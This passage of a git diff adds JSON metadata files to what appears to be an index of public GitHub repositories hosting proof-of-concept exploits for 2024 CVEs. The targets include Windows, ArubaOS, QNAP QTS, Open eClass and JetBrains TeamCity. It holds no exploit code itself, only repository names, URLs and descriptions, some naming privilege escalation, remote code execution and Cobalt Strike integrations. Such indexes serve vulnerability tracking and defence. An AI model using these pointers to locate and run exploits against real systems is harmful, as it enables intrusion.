+ "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "information-disclosure" + ], + "visibility": "public", + "forks": 3, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-26218.json b/2024/CVE-2024-26218.json new file mode 100644 index 0000000000..7f80a5d101 --- /dev/null +++ b/2024/CVE-2024-26218.json @@ -0,0 +1,33 @@ +[ + { + "id": 792427388, + "name": "CVE-2024-26218", + "full_name": "exploits-forsale\/CVE-2024-26218", + "owner": { + "login": "exploits-forsale", + "id": 168065072, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/168065072?v=4", + "html_url": "https:\/\/github.com\/exploits-forsale", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/exploits-forsale\/CVE-2024-26218", + "description": "Proof-of-Concept for CVE-2024-26218", + "fork": false, + "created_at": "2024-04-26T16:41:04Z", + "updated_at": "2024-11-23T23:34:02Z", + "pushed_at": "2024-04-26T16:46:15Z", + "stargazers_count": 48, + "watchers_count": 48, + "has_discussions": false, + "forks_count": 16, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 16, + "watchers": 48, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-26229.json b/2024/CVE-2024-26229.json new file mode 100644 index 0000000000..88e6146b83 --- /dev/null +++ b/2024/CVE-2024-26229.json @@ -0,0 +1,188 @@ +[ + { + "id": 813202333, + "name": "CVE-2024-26229", + "full_name": "varwara\/CVE-2024-26229", + "owner": { + "login": "varwara", + "id": 167913816, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/167913816?v=4", + "html_url": "https:\/\/github.com\/varwara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/varwara\/CVE-2024-26229", + "description": "CWE-781: Improper Address Validation in IOCTL with METHOD_NEITHER I\/O Control Code", + "fork": false, + "created_at": "2024-06-10T17:02:03Z", + "updated_at": "2024-11-28T05:47:36Z", + "pushed_at": "2024-07-04T10:39:15Z", + "stargazers_count": 321, + "watchers_count": 321, + "has_discussions": false, + "forks_count": 63, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 63, + "watchers": 321, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 813503450, + "name": "CVE-2024-26229-exploit", + "full_name": "RalfHacker\/CVE-2024-26229-exploit", + "owner": { + "login": "RalfHacker", + "id": 54005327, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54005327?v=4", + "html_url": "https:\/\/github.com\/RalfHacker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RalfHacker\/CVE-2024-26229-exploit", + "description": "Windows LPE", + "fork": false, + "created_at": "2024-06-11T08:03:29Z", + "updated_at": "2024-11-17T13:18:50Z", + "pushed_at": "2024-06-11T20:41:59Z", + "stargazers_count": 104, + "watchers_count": 104, + "has_discussions": false, + "forks_count": 23, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 23, + "watchers": 104, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 814637832, + "name": "CVE-2024-26229-BOF", + "full_name": "apkc\/CVE-2024-26229-BOF", + "owner": { + "login": "apkc", + "id": 18083944, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18083944?v=4", + "html_url": "https:\/\/github.com\/apkc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/apkc\/CVE-2024-26229-BOF", + "description": "BOF implementations of CVE-2024-26229 for Cobalt Strike and BruteRatel", + "fork": false, + "created_at": "2024-06-13T11:57:50Z", + "updated_at": "2024-11-05T09:38:31Z", + "pushed_at": "2024-06-13T07:30:48Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 32, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 32, + "watchers": 14, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 815768749, + "name": "CVE-2024-26229", + "full_name": "team-MineDEV\/CVE-2024-26229", + "owner": { + "login": "team-MineDEV", + "id": 149191616, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149191616?v=4", + "html_url": "https:\/\/github.com\/team-MineDEV", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/team-MineDEV\/CVE-2024-26229", + "description": "Windows CSC服务特权提升漏洞。 当程序向缓冲区写入的数据超出其处理能力时,就会发生基于堆的缓冲区溢出,从而导致多余的数据溢出到相邻的内存区域。这种溢出会损坏内存,并可能使攻击者能够执行任意代码或未经授权访问系统。本质上,攻击者可以编写触发溢出的恶意代码或输入,从而控制受影响的系统、执行任意命令、安装恶意软件或访问敏感数据。 微软已发出警告成功利用此漏洞的攻击者可以获得 SYSTEM 权限,这是 Windows 系统上的最高访问级别。这增加了与 CVE-2024-26229 相关的风险,使其成为恶意行为者的主要目标。", + "fork": false, + "created_at": "2024-06-16T05:06:31Z", + "updated_at": "2024-11-02T06:09:23Z", + "pushed_at": "2024-06-16T05:29:26Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 838016004, + "name": "eop24-26229", + "full_name": "Cracked5pider\/eop24-26229", + "owner": { + "login": "Cracked5pider", + "id": 51360176, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51360176?v=4", + "html_url": "https:\/\/github.com\/Cracked5pider", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cracked5pider\/eop24-26229", + "description": "A firebeam plugin that exploits the CVE-2024-26229 vulnerability to perform elevation of privilege from a unprivileged user", + "fork": false, + "created_at": "2024-08-04T17:40:51Z", + "updated_at": "2024-11-20T16:30:59Z", + "pushed_at": "2024-08-15T10:48:05Z", + "stargazers_count": 33, + "watchers_count": 33, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 33, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 871953279, + "name": "CVE-2024-26229", + "full_name": "mqxmm\/CVE-2024-26229", + "owner": { + "login": "mqxmm", + "id": 79595418, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79595418?v=4", + "html_url": "https:\/\/github.com\/mqxmm", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mqxmm\/CVE-2024-26229", + "description": null, + "fork": false, + "created_at": "2024-10-13T12:10:35Z", + "updated_at": "2024-10-13T12:11:24Z", + "pushed_at": "2024-10-13T12:11:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-26230.json b/2024/CVE-2024-26230.json new file mode 100644 index 0000000000..e0f80c5f14 --- /dev/null +++ b/2024/CVE-2024-26230.json @@ -0,0 +1,64 @@ +[ + { + "id": 785035412, + "name": "CVE-2024-26230", + "full_name": "kiwids0220\/CVE-2024-26230", + "owner": { + "login": "kiwids0220", + "id": 60630639, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60630639?v=4", + "html_url": "https:\/\/github.com\/kiwids0220", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kiwids0220\/CVE-2024-26230", + "description": null, + "fork": false, + "created_at": "2024-04-11T03:59:28Z", + "updated_at": "2024-10-07T21:05:21Z", + "pushed_at": "2024-08-09T15:02:24Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 848915075, + "name": "CVE-2024-26230", + "full_name": "Wa1nut4\/CVE-2024-26230", + "owner": { + "login": "Wa1nut4", + "id": 178184386, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/178184386?v=4", + "html_url": "https:\/\/github.com\/Wa1nut4", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Wa1nut4\/CVE-2024-26230", + "description": "LPE of CVE-2024-26230", + "fork": false, + "created_at": "2024-08-28T16:31:26Z", + "updated_at": "2024-11-19T10:36:20Z", + "pushed_at": "2024-09-01T07:03:46Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 20, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-26304.json b/2024/CVE-2024-26304.json new file mode 100644 index 0000000000..e8c9646b7c --- /dev/null +++ b/2024/CVE-2024-26304.json @@ -0,0 +1,33 @@ +[ + { + "id": 867909796, + "name": "CVE-2024-26304-RCE-exploit", + "full_name": "X-Projetion\/CVE-2024-26304-RCE-exploit", + "owner": { + "login": "X-Projetion", + "id": 161194427, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/161194427?v=4", + "html_url": "https:\/\/github.com\/X-Projetion", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/X-Projetion\/CVE-2024-26304-RCE-exploit", + "description": "CVE-2024-26304 is a critical vulnerability (CVSS score of 9.8) affecting ArubaOS", + "fork": false, + "created_at": "2024-10-05T01:38:36Z", + "updated_at": "2024-10-21T06:16:38Z", + "pushed_at": "2024-10-05T01:51:59Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-26308.json b/2024/CVE-2024-26308.json new file mode 100644 index 0000000000..8293b3f564 --- /dev/null +++ b/2024/CVE-2024-26308.json @@ -0,0 +1,33 @@ +[ + { + "id": 841056629, + "name": "cve", + "full_name": "crazycatMyopic\/cve", + "owner": { + "login": "crazycatMyopic", + "id": 70164315, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70164315?v=4", + "html_url": "https:\/\/github.com\/crazycatMyopic", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/crazycatMyopic\/cve", + "description": "Docker Deskop giving issue CVE-2024-26308 for maven [reproduce]", + "fork": false, + "created_at": "2024-08-11T14:10:14Z", + "updated_at": "2024-08-11T20:25:10Z", + "pushed_at": "2024-08-11T20:25:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-26475.json b/2024/CVE-2024-26475.json new file mode 100644 index 0000000000..5e79759fc2 --- /dev/null +++ b/2024/CVE-2024-26475.json @@ -0,0 +1,33 @@ +[ + { + "id": 770100852, + "name": "CVE-2024-26475", + "full_name": "TronciuVlad\/CVE-2024-26475", + "owner": { + "login": "TronciuVlad", + "id": 105599724, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105599724?v=4", + "html_url": "https:\/\/github.com\/TronciuVlad", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TronciuVlad\/CVE-2024-26475", + "description": "An issue in radareorg radare2 v.0.9.7 through v.5.8.6 and fixed in v.5.8.8 allows a local attacker to cause a denial of service via the grub_sfs_read_extent function.", + "fork": false, + "created_at": "2024-03-10T22:51:05Z", + "updated_at": "2024-05-12T19:45:47Z", + "pushed_at": "2024-03-10T23:44:06Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-26503.json b/2024/CVE-2024-26503.json new file mode 100644 index 0000000000..d1aced6167 --- /dev/null +++ b/2024/CVE-2024-26503.json @@ -0,0 +1,38 @@ +[ + { + "id": 772568314, + "name": "Exploit-CVE-2024-26503", + "full_name": "RoboGR00t\/Exploit-CVE-2024-26503", + "owner": { + "login": "RoboGR00t", + "id": 40581998, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40581998?v=4", + "html_url": "https:\/\/github.com\/RoboGR00t", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RoboGR00t\/Exploit-CVE-2024-26503", + "description": "Exploit for Open eClass – CVE-2024-26503: Unrestricted File Upload Leads to Remote Code Execution", + "fork": false, + "created_at": "2024-03-15T13:01:43Z", + "updated_at": "2024-03-19T07:33:51Z", + "pushed_at": "2024-03-15T13:15:36Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-26503", + "exploit", + "openeclass", + "rce" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-26521.json b/2024/CVE-2024-26521.json new file mode 100644 index 0000000000..2005af76ae --- /dev/null +++ b/2024/CVE-2024-26521.json @@ -0,0 +1,33 @@ +[ + { + "id": 758345985, + "name": "CVE-2024-26521", + "full_name": "hackervegas001\/CVE-2024-26521", + "owner": { + "login": "hackervegas001", + "id": 109858877, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/109858877?v=4", + "html_url": "https:\/\/github.com\/hackervegas001", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hackervegas001\/CVE-2024-26521", + "description": "Html Injection vulnearbility in CE-Phoenix-v1.0.8.20 where malicious HTML code is inserted into a website. This can lead to a variety of issues, from minor website defacement to serious data breaches.", + "fork": false, + "created_at": "2024-02-16T05:40:33Z", + "updated_at": "2024-05-12T17:50:42Z", + "pushed_at": "2024-03-02T11:16:34Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-26534.json b/2024/CVE-2024-26534.json new file mode 100644 index 0000000000..35019f7a0c --- /dev/null +++ b/2024/CVE-2024-26534.json @@ -0,0 +1,33 @@ +[ + { + "id": 763493353, + "name": "CVE-2024-26534", + "full_name": "sajaljat\/CVE-2024-26534", + "owner": { + "login": "sajaljat", + "id": 142223862, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/142223862?v=4", + "html_url": "https:\/\/github.com\/sajaljat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sajaljat\/CVE-2024-26534", + "description": null, + "fork": false, + "created_at": "2024-02-26T11:59:59Z", + "updated_at": "2024-02-26T12:00:00Z", + "pushed_at": "2024-02-26T12:01:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-26535.json b/2024/CVE-2024-26535.json new file mode 100644 index 0000000000..8f55ddf226 --- /dev/null +++ b/2024/CVE-2024-26535.json @@ -0,0 +1,33 @@ +[ + { + "id": 763494179, + "name": "CVE-2024-26535", + "full_name": "sajaljat\/CVE-2024-26535", + "owner": { + "login": "sajaljat", + "id": 142223862, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/142223862?v=4", + "html_url": "https:\/\/github.com\/sajaljat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sajaljat\/CVE-2024-26535", + "description": "(XSS)", + "fork": false, + "created_at": "2024-02-26T12:02:10Z", + "updated_at": "2024-02-26T12:02:10Z", + "pushed_at": "2024-02-26T12:02:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-26560.json b/2024/CVE-2024-26560.json new file mode 100644 index 0000000000..faee1d15b4 --- /dev/null +++ b/2024/CVE-2024-26560.json @@ -0,0 +1,33 @@ +[ + { + "id": 763494836, + "name": "CVE-2024-26560", + "full_name": "sajaljat\/CVE-2024-26560", + "owner": { + "login": "sajaljat", + "id": 142223862, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/142223862?v=4", + "html_url": "https:\/\/github.com\/sajaljat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sajaljat\/CVE-2024-26560", + "description": "(XSS)", + "fork": false, + "created_at": "2024-02-26T12:03:43Z", + "updated_at": "2024-02-26T12:03:44Z", + "pushed_at": "2024-02-26T12:04:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-26574.json b/2024/CVE-2024-26574.json new file mode 100644 index 0000000000..612d2ac579 --- /dev/null +++ b/2024/CVE-2024-26574.json @@ -0,0 +1,33 @@ +[ + { + "id": 782022650, + "name": "CVE-2024-26574", + "full_name": "Alaatk\/CVE-2024-26574", + "owner": { + "login": "Alaatk", + "id": 21007805, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21007805?v=4", + "html_url": "https:\/\/github.com\/Alaatk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Alaatk\/CVE-2024-26574", + "description": "Wondershare Filmora v.13.0.51 - Insecure Permissions Privilege Escalation", + "fork": false, + "created_at": "2024-04-04T13:44:08Z", + "updated_at": "2024-04-17T11:50:47Z", + "pushed_at": "2024-04-04T13:49:34Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-26581.json b/2024/CVE-2024-26581.json new file mode 100644 index 0000000000..8f8a200e26 --- /dev/null +++ b/2024/CVE-2024-26581.json @@ -0,0 +1,73 @@ +[ + { + "id": 855087462, + "name": "CVE-2024-26581-Checker", + "full_name": "madfxr\/CVE-2024-26581-Checker", + "owner": { + "login": "madfxr", + "id": 30550561, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30550561?v=4", + "html_url": "https:\/\/github.com\/madfxr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/madfxr\/CVE-2024-26581-Checker", + "description": "[CVE-2024-26581] Vulnerability Checker for BGN Internal", + "fork": false, + "created_at": "2024-09-10T09:32:25Z", + "updated_at": "2024-09-23T07:56:31Z", + "pushed_at": "2024-09-23T07:56:27Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bash", + "bash-scripting", + "cve-2024-26581", + "cybersecurity", + "kernel", + "linux", + "nftables", + "shell-scripting" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 855652997, + "name": "Linux-Root-CVE-2024-26581-PoC", + "full_name": "laoqin1234\/Linux-Root-CVE-2024-26581-PoC", + "owner": { + "login": "laoqin1234", + "id": 23544811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23544811?v=4", + "html_url": "https:\/\/github.com\/laoqin1234", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/laoqin1234\/Linux-Root-CVE-2024-26581-PoC", + "description": null, + "fork": false, + "created_at": "2024-09-11T08:29:40Z", + "updated_at": "2024-09-11T08:29:40Z", + "pushed_at": "2024-09-11T08:29:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-2667.json b/2024/CVE-2024-2667.json new file mode 100644 index 0000000000..dbbc28bf3b --- /dev/null +++ b/2024/CVE-2024-2667.json @@ -0,0 +1,33 @@ +[ + { + "id": 793188530, + "name": "CVE-2024-2667", + "full_name": "Puvipavan\/CVE-2024-2667", + "owner": { + "login": "Puvipavan", + "id": 14966528, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14966528?v=4", + "html_url": "https:\/\/github.com\/Puvipavan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Puvipavan\/CVE-2024-2667", + "description": "This is POC for CVE-2024-2667 (InstaWP Connect – 1-click WP Staging & Migration <= 0.1.0.22 - Unauthenticated Arbitrary File Upload)", + "fork": false, + "created_at": "2024-04-28T17:14:47Z", + "updated_at": "2024-05-20T08:06:42Z", + "pushed_at": "2024-04-28T17:30:15Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-26817.json b/2024/CVE-2024-26817.json new file mode 100644 index 0000000000..9093bc0567 --- /dev/null +++ b/2024/CVE-2024-26817.json @@ -0,0 +1,33 @@ +[ + { + "id": 786424034, + "name": "CVE-2024-26817-amdkfd", + "full_name": "MaherAzzouzi\/CVE-2024-26817-amdkfd", + "owner": { + "login": "MaherAzzouzi", + "id": 62230190, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62230190?v=4", + "html_url": "https:\/\/github.com\/MaherAzzouzi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MaherAzzouzi\/CVE-2024-26817-amdkfd", + "description": "Potential Integer Overflow Leading To Heap Overflow in AMD KFD.", + "fork": false, + "created_at": "2024-04-14T12:25:50Z", + "updated_at": "2024-04-15T15:01:56Z", + "pushed_at": "2024-04-14T12:30:21Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-27088.json b/2024/CVE-2024-27088.json new file mode 100644 index 0000000000..639d067b80 --- /dev/null +++ b/2024/CVE-2024-27088.json @@ -0,0 +1,33 @@ +[ + { + "id": 845361466, + "name": "CVE-2024-27088", + "full_name": "200101WhoAmI\/CVE-2024-27088", + "owner": { + "login": "200101WhoAmI", + "id": 176820518, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/176820518?v=4", + "html_url": "https:\/\/github.com\/200101WhoAmI", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/200101WhoAmI\/CVE-2024-27088", + "description": "redos", + "fork": false, + "created_at": "2024-08-21T05:21:38Z", + "updated_at": "2024-08-21T05:21:58Z", + "pushed_at": "2024-08-21T05:21:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-27130.json b/2024/CVE-2024-27130.json new file mode 100644 index 0000000000..7b45485fd3 --- /dev/null +++ b/2024/CVE-2024-27130.json @@ -0,0 +1,95 @@ +[ + { + "id": 801938261, + "name": "CVE-2024-27130", + "full_name": "watchtowrlabs\/CVE-2024-27130", + "owner": { + "login": "watchtowrlabs", + "id": 99977116, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99977116?v=4", + "html_url": "https:\/\/github.com\/watchtowrlabs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/watchtowrlabs\/CVE-2024-27130", + "description": "PoC for CVE-2024-27130", + "fork": false, + "created_at": "2024-05-17T07:58:01Z", + "updated_at": "2024-11-20T16:30:47Z", + "pushed_at": "2024-05-17T10:27:07Z", + "stargazers_count": 32, + "watchers_count": 32, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 15, + "watchers": 32, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 803775593, + "name": "CVE-2024-27130", + "full_name": "d0rb\/CVE-2024-27130", + "owner": { + "login": "d0rb", + "id": 10403781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10403781?v=4", + "html_url": "https:\/\/github.com\/d0rb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/d0rb\/CVE-2024-27130", + "description": "This Python script is designed as a proof-of-concept (PoC) for the CVE-2024-27130 vulnerability in QNAP QTS", + "fork": false, + "created_at": "2024-05-21T11:14:22Z", + "updated_at": "2024-06-06T09:32:41Z", + "pushed_at": "2024-05-21T11:21:42Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 892653629, + "name": "cve-2024-27130-poc", + "full_name": "XiaomingX\/cve-2024-27130-poc", + "owner": { + "login": "XiaomingX", + "id": 5387930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5387930?v=4", + "html_url": "https:\/\/github.com\/XiaomingX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XiaomingX\/cve-2024-27130-poc", + "description": "CVE-2024-27130是影响QNAP网络附加存储(NAS)设备的一个严重漏洞。该漏洞源于QTS操作系统中share.cgi脚本的No_Support_ACL函数中不安全地使用strcpy函数,导致堆栈缓冲区溢出。攻击者可以利用此漏洞,通过精心构造的请求在目标系统上执行任意代码,进而完全控制受影响的设备。 ", + "fork": false, + "created_at": "2024-11-22T14:18:08Z", + "updated_at": "2024-11-22T14:56:43Z", + "pushed_at": "2024-11-22T14:20:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-27173.json b/2024/CVE-2024-27173.json new file mode 100644 index 0000000000..04072b376b --- /dev/null +++ b/2024/CVE-2024-27173.json @@ -0,0 +1,33 @@ +[ + { + "id": 815013986, + "name": "0day-POC-for-CVE-2024-27173", + "full_name": "Ieakd\/0day-POC-for-CVE-2024-27173", + "owner": { + "login": "Ieakd", + "id": 172750219, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/172750219?v=4", + "html_url": "https:\/\/github.com\/Ieakd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ieakd\/0day-POC-for-CVE-2024-27173", + "description": null, + "fork": false, + "created_at": "2024-06-14T07:04:46Z", + "updated_at": "2024-06-14T07:08:01Z", + "pushed_at": "2024-06-14T07:07:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-27198.json b/2024/CVE-2024-27198.json new file mode 100644 index 0000000000..b36c05e3d2 --- /dev/null +++ b/2024/CVE-2024-27198.json @@ -0,0 +1,442 @@ +[ + { + "id": 767217611, + "name": "CVE-2024-27198", + "full_name": "Chocapikk\/CVE-2024-27198", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2024-27198", + "description": "Proof of Concept for Authentication Bypass in JetBrains TeamCity Pre-2023.11.4", + "fork": false, + "created_at": "2024-03-04T22:44:36Z", + "updated_at": "2024-11-20T16:30:41Z", + "pushed_at": "2024-03-05T20:53:11Z", + "stargazers_count": 31, + "watchers_count": 31, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 31, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 767340674, + "name": "CVE-2024-27198", + "full_name": 